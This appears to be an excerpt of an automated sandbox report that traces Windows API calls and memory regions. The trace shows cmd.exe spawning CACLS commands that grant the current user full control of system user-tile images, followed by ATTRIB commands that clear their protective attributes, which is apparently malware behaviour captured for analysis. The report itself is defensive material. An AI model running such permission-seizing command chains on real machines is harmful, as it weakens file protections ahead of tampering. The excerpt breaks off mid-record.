[0184.519] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.519] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.519] GetEnvironmentStringsW () returned 0x2d2410* [0184.519] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.519] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af348 | out: lpAttributeList=0x1af348) [0184.519] GetConsoleTitleW (in: lpConsoleTitle=0x1af72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.519] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.519] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2ce4d8 [0184.520] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0xffffffff [0184.520] GetLastError () returned 0x2 [0184.520] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aefc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aefc8) returned 0x2ce4d8 [0184.521] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0184.521] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.521] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.521] GetConsoleTitleW (in: lpConsoleTitle=0x1af4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.521] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af348, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af410 | out: lpAttributeList=0x1af348, lpSize=0x1af410) returned 1 [0184.521] UpdateProcThreadAttribute (in: lpAttributeList=0x1af348, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af348, lpPreviousValue=0x0) returned 1 [0184.521] GetStartupInfoW (in: lpStartupInfo=0x1af304 | out: lpStartupInfo=0x1af304*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.521] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.521] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af3f0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessInformation=0x1af3f0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x514, dwThreadId=0xdb8)) returned 1 [0184.522] CloseHandle (hObject=0x50) returned 1 [0184.522] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.522] GetEnvironmentStringsW () returned 0x2d2410* [0184.523] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.523] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0184.707] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af2e4 | out: lpExitCode=0x1af2e4*=0x0) returned 1 [0184.707] CloseHandle (hObject=0x4c) returned 1 [0184.707] _vsnwprintf (in: _Buffer=0x1af42c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af2f0 | out: _Buffer="00000000") returned 8 [0184.707] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0184.707] GetEnvironmentStringsW () returned 0x2d2410* [0184.707] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.707] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.707] GetEnvironmentStringsW () returned 0x2d2410* [0184.707] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0184.707] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af348 | out: lpAttributeList=0x1af348) [0184.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.707] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.707] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0184.708] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.708] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.708] SetConsoleInputExeNameW () returned 0x1 [0184.708] GetConsoleOutputCP () returned 0x1b5 [0184.708] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.708] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.708] exit (_Code=0) Process: id = "365" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xfd0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26222 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26223 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26224 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26225 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26226 start_va = 0xaa0000 end_va = 0xaa8fff entry_point = 0xaa0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26227 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26228 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26229 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26230 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26231 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26232 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26233 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26234 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26235 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 26236 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 26237 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26238 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26239 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26240 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26241 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26242 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26243 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 523 os_tid = 0xdb0 Thread: id = 524 os_tid = 0x91c Process: id = "366" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x514" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xfd0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26244 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26245 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26246 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26247 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26248 start_va = 0x200000 end_va = 0x206fff entry_point = 0x200000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26249 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26250 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26251 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26252 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26253 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26254 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26255 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26256 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26257 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 26258 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26259 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26260 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26261 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26262 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26263 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26264 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26265 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26266 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26267 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26268 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26269 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26270 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 26271 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 26272 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26273 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 525 os_tid = 0xdb8 Process: id = "367" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26274 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26275 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26276 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26277 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 26278 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26279 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26280 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26281 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26282 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26283 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26284 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26285 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26286 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26287 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26288 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 26289 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26290 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26291 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26292 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26293 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26294 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26295 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26296 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26297 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26298 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 26299 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26300 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26301 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26302 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 26303 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 26304 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 26305 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 26306 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 26307 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 26308 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 526 os_tid = 0xd80 [0184.936] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7dc | out: lpSystemTimeAsFileTime=0x1cf7dc*(dwLowDateTime=0xa322bb00, dwHighDateTime=0x1d440a9)) [0184.936] GetCurrentProcessId () returned 0xd48 [0184.936] GetCurrentThreadId () returned 0xd80 [0184.936] GetTickCount () returned 0x34e5d [0184.936] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7d4 | out: lpPerformanceCount=0x1cf7d4*=24172658377) returned 1 [0184.940] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0184.940] __set_app_type (_Type=0x1) [0184.940] __p__fmode () returned 0x76b331f4 [0184.940] __p__commode () returned 0x76b331fc [0184.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0184.940] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0184.940] GetCurrentThreadId () returned 0xd80 [0184.940] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd80) returned 0x38 [0184.940] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.940] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0184.941] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.941] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0184.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf76c | out: phkResult=0x1cf76c*=0x0) returned 0x2 [0184.941] VirtualQuery (in: lpAddress=0x1cf7a3, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf73c, dwLength=0x1c | out: 